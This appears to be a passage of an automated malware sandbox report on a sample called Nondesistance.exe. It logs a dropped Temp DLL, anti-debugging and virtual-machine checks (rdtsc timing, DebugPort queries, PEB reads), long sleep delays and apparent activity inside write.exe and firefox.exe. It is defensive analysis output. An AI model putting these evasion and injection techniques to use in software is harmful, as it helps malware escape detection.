        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe Code function: 10_2_00603BF6 push cs; retf 10_2_00603C79
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe Code function: 10_2_0060A430 push esi; retf 10_2_0060A43B
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe Code function: 10_2_0061CCEC push ebx; retf 10_2_0061CD0B
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe Code function: 10_2_0061CCF0 push ebx; retf 10_2_0061CD0B
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe Code function: 10_2_00618D0C push ebx; iretd 10_2_00618D0D
        Source: C:\Users\user\Desktop\Nondesistance.exe File created: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\write.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_32531763 rdtsc 9_2_32531763
        Source: C:\Windows\SysWOW64\write.exe Window / User API: threadDelayed 9713
        Source: C:\Users\user\Desktop\Nondesistance.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe API coverage: 0.2 %
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe TID: 7220 Thread sleep time: -115000s >= -30000s
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe TID: 7220 Thread sleep count: 44 > 30
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe TID: 7220 Thread sleep time: -66000s >= -30000s
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe TID: 7220 Thread sleep count: 62 > 30
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe TID: 7220 Thread sleep time: -62000s >= -30000s
        Source: C:\Windows\SysWOW64\write.exe TID: 4792 Thread sleep count: 120 > 30
        Source: C:\Windows\SysWOW64\write.exe TID: 4792 Thread sleep time: -240000s >= -30000s
        Source: C:\Windows\SysWOW64\write.exe TID: 4792 Thread sleep count: 9713 > 30
        Source: C:\Windows\SysWOW64\write.exe TID: 4792 Thread sleep time: -19426000s >= -30000s
        Source: C:\Windows\SysWOW64\write.exe Last function: Thread delayed
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 4_2_00406033 FindFirstFileA,FindClose, 4_2_00406033
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 4_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 4_2_004055D1
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 4_2_00402688 FindFirstFileA, 4_2_00402688
        Source: Nondesistance.exe, 00000009.00000003.20300938788.00000000021D5000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20393067767.00000000021D5000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20393067767.0000000002168000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25031337146.000000000078F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC
        Source: write.exe, 0000000B.00000002.25030469735.0000000002DD4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000C.00000002.20675207011.000002D946E0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe API call chain: ExitProcess graph end node graph_4-4021
        Source: C:\Users\user\Desktop\Nondesistance.exe API call chain: ExitProcess graph end node graph_4-4185
        Source: C:\Windows\SysWOW64\write.exe Process information queried: ProcessInformation
        Source: C:\Windows\SysWOW64\write.exe Process queried: DebugPort
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_32531763 rdtsc 9_2_32531763
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 4_2_00403A41 SetWindowPos,ShowWindow,DestroyWindow,SetWindowLongA,GetDlgItem,SendMessageA,IsWindowEnabled,SendMessageA,GetDlgItem,LdrInitializeThunk,GetDlgItem,GetDlgItem,SetClassLongA,LdrInitializeThunk,SendMessageA,LdrInitializeThunk,LdrInitializeThunk,GetDlgItem,ShowWindow,KiUserCallbackDispatcher,EnableWindow,LdrInitializeThunk,GetSystemMenu,EnableMenuItem,SendMessageA,LdrInitializeThunk,SendMessageA,SendMessageA,lstrlenA,SetWindowTextA,DestroyWindow,CreateDialogParamA,GetDlgItem,GetWindowRect,ScreenToClient,SetWindowPos,ShowWindow,DestroyWindow,EndDialog,ShowWindow, 4_2_00403A41
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 4_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 4_2_10001A5D
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_3251F24A mov eax, dword ptr fs:[00000030h] 9_2_3251F24A
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF113 mov eax, dword ptr fs:[00000030h]9_2_324EF113
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF113 mov eax, dword ptr fs:[00000030h]9_2_324EF113
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF113 mov eax, dword ptr fs:[00000030h]9_2_324EF113
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF113 mov eax, dword ptr fs:[00000030h]9_2_324EF113
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF113 mov eax, dword ptr fs:[00000030h]9_2_324EF113
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF113 mov eax, dword ptr fs:[00000030h]9_2_324EF113
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF113 mov eax, dword ptr fs:[00000030h]9_2_324EF113
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF113 mov eax, dword ptr fs:[00000030h]9_2_324EF113
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF113 mov eax, dword ptr fs:[00000030h]9_2_324EF113
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF113 mov eax, dword ptr fs:[00000030h]9_2_324EF113
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF113 mov eax, dword ptr fs:[00000030h]9_2_324EF113
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF113 mov eax, dword ptr fs:[00000030h]9_2_324EF113
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF113 mov eax, dword ptr fs:[00000030h]9_2_324EF113
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251510F mov eax, dword ptr fs:[00000030h]9_2_3251510F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251510F mov eax, dword ptr fs:[00000030h]9_2_3251510F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251510F mov eax, dword ptr fs:[00000030h]9_2_3251510F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251510F mov eax, dword ptr fs:[00000030h]9_2_3251510F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251510F mov eax, dword ptr fs:[00000030h]9_2_3251510F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251510F mov eax, dword ptr fs:[00000030h]9_2_3251510F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251510F mov eax, dword ptr fs:[00000030h]9_2_3251510F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251510F mov eax, dword ptr fs:[00000030h]9_2_3251510F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251510F mov eax, dword ptr fs:[00000030h]9_2_3251510F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251510F mov eax, dword ptr fs:[00000030h]9_2_3251510F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251510F mov eax, dword ptr fs:[00000030h]9_2_3251510F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251510F mov eax, dword ptr fs:[00000030h]9_2_3251510F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251510F mov eax, dword ptr fs:[00000030h]9_2_3251510F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325AF13E mov eax, dword ptr fs:[00000030h]9_2_325AF13E
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3257A130 mov eax, dword ptr fs:[00000030h]9_2_3257A130
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32527128 mov eax, dword ptr fs:[00000030h]9_2_32527128
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32527128 mov eax, dword ptr fs:[00000030h]9_2_32527128
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325001C0 mov eax, dword ptr fs:[00000030h]9_2_325001C0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325001C0 mov eax, dword ptr fs:[00000030h]9_2_325001C0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325051C0 mov eax, dword ptr fs:[00000030h]9_2_325051C0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325051C0 mov eax, dword ptr fs:[00000030h]9_2_325051C0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325051C0 mov eax, dword ptr fs:[00000030h]9_2_325051C0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325051C0 mov eax, dword ptr fs:[00000030h]9_2_325051C0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325001F1 mov eax, dword ptr fs:[00000030h]9_2_325001F1
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325001F1 mov eax, dword ptr fs:[00000030h]9_2_325001F1
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325001F1 mov eax, dword ptr fs:[00000030h]9_2_325001F1
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251F1F0 mov eax, dword ptr fs:[00000030h]9_2_3251F1F0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251F1F0 mov eax, dword ptr fs:[00000030h]9_2_3251F1F0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324E81EB mov eax, dword ptr fs:[00000030h]9_2_324E81EB
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F91E5 mov eax, dword ptr fs:[00000030h]9_2_324F91E5
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F91E5 mov eax, dword ptr fs:[00000030h]9_2_324F91E5
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324FA1E3 mov eax, dword ptr fs:[00000030h]9_2_324FA1E3
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324FA1E3 mov eax, dword ptr fs:[00000030h]9_2_324FA1E3
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324FA1E3 mov eax, dword ptr fs:[00000030h]9_2_324FA1E3
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324FA1E3 mov eax, dword ptr fs:[00000030h]9_2_324FA1E3
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324FA1E3 mov eax, dword ptr fs:[00000030h]9_2_324FA1E3
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251B1E0 mov eax, dword ptr fs:[00000030h]9_2_3251B1E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251B1E0 mov eax, dword ptr fs:[00000030h]9_2_3251B1E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251B1E0 mov eax, dword ptr fs:[00000030h]9_2_3251B1E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251B1E0 mov eax, dword ptr fs:[00000030h]9_2_3251B1E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251B1E0 mov eax, dword ptr fs:[00000030h]9_2_3251B1E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251B1E0 mov eax, dword ptr fs:[00000030h]9_2_3251B1E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251B1E0 mov eax, dword ptr fs:[00000030h]9_2_3251B1E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325B81EE mov eax, dword ptr fs:[00000030h]9_2_325B81EE
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325B81EE mov eax, dword ptr fs:[00000030h]9_2_325B81EE
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324E91F0 mov eax, dword ptr fs:[00000030h]9_2_324E91F0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324E91F0 mov eax, dword ptr fs:[00000030h]9_2_324E91F0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32531190 mov eax, dword ptr fs:[00000030h]9_2_32531190
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32531190 mov eax, dword ptr fs:[00000030h]9_2_32531190
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32519194 mov eax, dword ptr fs:[00000030h]9_2_32519194
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F4180 mov eax, dword ptr fs:[00000030h]9_2_324F4180
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F4180 mov eax, dword ptr fs:[00000030h]9_2_324F4180
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F4180 mov eax, dword ptr fs:[00000030h]9_2_324F4180
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325241BB mov ecx, dword ptr fs:[00000030h]9_2_325241BB
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325241BB mov eax, dword ptr fs:[00000030h]9_2_325241BB
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325241BB mov eax, dword ptr fs:[00000030h]9_2_325241BB
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325C51B6 mov eax, dword ptr fs:[00000030h]9_2_325C51B6
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325231BE mov eax, dword ptr fs:[00000030h]9_2_325231BE
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325231BE mov eax, dword ptr fs:[00000030h]9_2_325231BE
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252E1A4 mov eax, dword ptr fs:[00000030h]9_2_3252E1A4
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252E1A4 mov eax, dword ptr fs:[00000030h]9_2_3252E1A4
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324ED64A mov eax, dword ptr fs:[00000030h]9_2_324ED64A
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324ED64A mov eax, dword ptr fs:[00000030h]9_2_324ED64A
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32525654 mov eax, dword ptr fs:[00000030h]9_2_32525654
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252265C mov eax, dword ptr fs:[00000030h]9_2_3252265C
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252265C mov ecx, dword ptr fs:[00000030h]9_2_3252265C
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252265C mov eax, dword ptr fs:[00000030h]9_2_3252265C
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F3640 mov eax, dword ptr fs:[00000030h]9_2_324F3640
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3250F640 mov eax, dword ptr fs:[00000030h]9_2_3250F640
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3250F640 mov eax, dword ptr fs:[00000030h]9_2_3250F640
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3250F640 mov eax, dword ptr fs:[00000030h]9_2_3250F640
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252C640 mov eax, dword ptr fs:[00000030h]9_2_3252C640
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252C640 mov eax, dword ptr fs:[00000030h]9_2_3252C640
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F965A mov eax, dword ptr fs:[00000030h]9_2_324F965A
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F965A mov eax, dword ptr fs:[00000030h]9_2_324F965A
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32532670 mov eax, dword ptr fs:[00000030h]9_2_32532670
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32532670 mov eax, dword ptr fs:[00000030h]9_2_32532670
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324E7662 mov eax, dword ptr fs:[00000030h]9_2_324E7662
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324E7662 mov eax, dword ptr fs:[00000030h]9_2_324E7662
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324E7662 mov eax, dword ptr fs:[00000030h]9_2_324E7662
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32503660 mov eax, dword ptr fs:[00000030h]9_2_32503660
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32503660 mov eax, dword ptr fs:[00000030h]9_2_32503660
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32503660 mov eax, dword ptr fs:[00000030h]9_2_32503660
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F0670 mov eax, dword ptr fs:[00000030h]9_2_324F0670
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252666D mov esi, dword ptr fs:[00000030h]9_2_3252666D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252666D mov eax, dword ptr fs:[00000030h]9_2_3252666D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252666D mov eax, dword ptr fs:[00000030h]9_2_3252666D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32583608 mov eax, dword ptr fs:[00000030h]9_2_32583608
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32583608 mov eax, dword ptr fs:[00000030h]9_2_32583608
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32583608 mov eax, dword ptr fs:[00000030h]9_2_32583608
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32583608 mov eax, dword ptr fs:[00000030h]9_2_32583608
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32583608 mov eax, dword ptr fs:[00000030h]9_2_32583608
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32583608 mov eax, dword ptr fs:[00000030h]9_2_32583608
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251D600 mov eax, dword ptr fs:[00000030h]9_2_3251D600
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251D600 mov eax, dword ptr fs:[00000030h]9_2_3251D600
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325C4600 mov eax, dword ptr fs:[00000030h]9_2_325C4600
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325AF607 mov eax, dword ptr fs:[00000030h]9_2_325AF607
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252360F mov eax, dword ptr fs:[00000030h]9_2_3252360F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32520630 mov eax, dword ptr fs:[00000030h]9_2_32520630
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32578633 mov esi, dword ptr fs:[00000030h]9_2_32578633
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32578633 mov eax, dword ptr fs:[00000030h]9_2_32578633
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32578633 mov eax, dword ptr fs:[00000030h]9_2_32578633
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F7623 mov eax, dword ptr fs:[00000030h]9_2_324F7623
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F5622 mov eax, dword ptr fs:[00000030h]9_2_324F5622
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F5622 mov eax, dword ptr fs:[00000030h]9_2_324F5622
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3259D62C mov ecx, dword ptr fs:[00000030h]9_2_3259D62C
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3259D62C mov ecx, dword ptr fs:[00000030h]9_2_3259D62C
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3259D62C mov eax, dword ptr fs:[00000030h]9_2_3259D62C
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F0630 mov eax, dword ptr fs:[00000030h]9_2_324F0630
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F06CF mov eax, dword ptr fs:[00000030h]9_2_324F06CF
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251D6D0 mov eax, dword ptr fs:[00000030h]9_2_3251D6D0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325BA6C0 mov eax, dword ptr fs:[00000030h]9_2_325BA6C0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325986C2 mov eax, dword ptr fs:[00000030h]9_2_325986C2
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3256C6F2 mov eax, dword ptr fs:[00000030h]9_2_3256C6F2
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3256C6F2 mov eax, dword ptr fs:[00000030h]9_2_3256C6F2
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324E96E0 mov eax, dword ptr fs:[00000030h]9_2_324E96E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324E96E0 mov eax, dword ptr fs:[00000030h]9_2_324E96E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324FC6E0 mov eax, dword ptr fs:[00000030h]9_2_324FC6E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F56E0 mov eax, dword ptr fs:[00000030h]9_2_324F56E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F56E0 mov eax, dword ptr fs:[00000030h]9_2_324F56E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F56E0 mov eax, dword ptr fs:[00000030h]9_2_324F56E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325166E0 mov eax, dword ptr fs:[00000030h]9_2_325166E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325166E0 mov eax, dword ptr fs:[00000030h]9_2_325166E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3257C691 mov eax, dword ptr fs:[00000030h]9_2_3257C691
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32500680 mov eax, dword ptr fs:[00000030h]9_2_32500680
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32500680 mov eax, dword ptr fs:[00000030h]9_2_32500680
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32500680 mov eax, dword ptr fs:[00000030h]9_2_32500680
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32500680 mov eax, dword ptr fs:[00000030h]9_2_32500680
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32500680 mov eax, dword ptr fs:[00000030h]9_2_32500680
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32500680 mov eax, dword ptr fs:[00000030h]9_2_32500680
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32500680 mov eax, dword ptr fs:[00000030h]9_2_32500680
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32500680 mov eax, dword ptr fs:[00000030h]9_2_32500680
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32500680 mov eax, dword ptr fs:[00000030h]9_2_32500680
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32500680 mov eax, dword ptr fs:[00000030h]9_2_32500680
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32500680 mov eax, dword ptr fs:[00000030h]9_2_32500680
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32500680 mov eax, dword ptr fs:[00000030h]9_2_32500680
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325AF68C mov eax, dword ptr fs:[00000030h]9_2_325AF68C
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F8690 mov eax, dword ptr fs:[00000030h]9_2_324F8690
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325B86A8 mov eax, dword ptr fs:[00000030h]9_2_325B86A8
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325B86A8 mov eax, dword ptr fs:[00000030h]9_2_325B86A8
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252A750 mov eax, dword ptr fs:[00000030h]9_2_3252A750
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32512755 mov eax, dword ptr fs:[00000030h]9_2_32512755
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32512755 mov eax, dword ptr fs:[00000030h]9_2_32512755
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32512755 mov eax, dword ptr fs:[00000030h]9_2_32512755
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32512755 mov ecx, dword ptr fs:[00000030h]9_2_32512755
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32512755 mov eax, dword ptr fs:[00000030h]9_2_32512755
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32512755 mov eax, dword ptr fs:[00000030h]9_2_32512755
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3259E750 mov eax, dword ptr fs:[00000030h]9_2_3259E750
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32523740 mov eax, dword ptr fs:[00000030h]9_2_32523740
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF75B mov eax, dword ptr fs:[00000030h]9_2_324EF75B
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF75B mov eax, dword ptr fs:[00000030h]9_2_324EF75B
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF75B mov eax, dword ptr fs:[00000030h]9_2_324EF75B
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF75B mov eax, dword ptr fs:[00000030h]9_2_324EF75B
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF75B mov eax, dword ptr fs:[00000030h]9_2_324EF75B
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF75B mov eax, dword ptr fs:[00000030h]9_2_324EF75B
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF75B mov eax, dword ptr fs:[00000030h]9_2_324EF75B
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF75B mov eax, dword ptr fs:[00000030h]9_2_324EF75B
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF75B mov eax, dword ptr fs:[00000030h]9_2_324EF75B
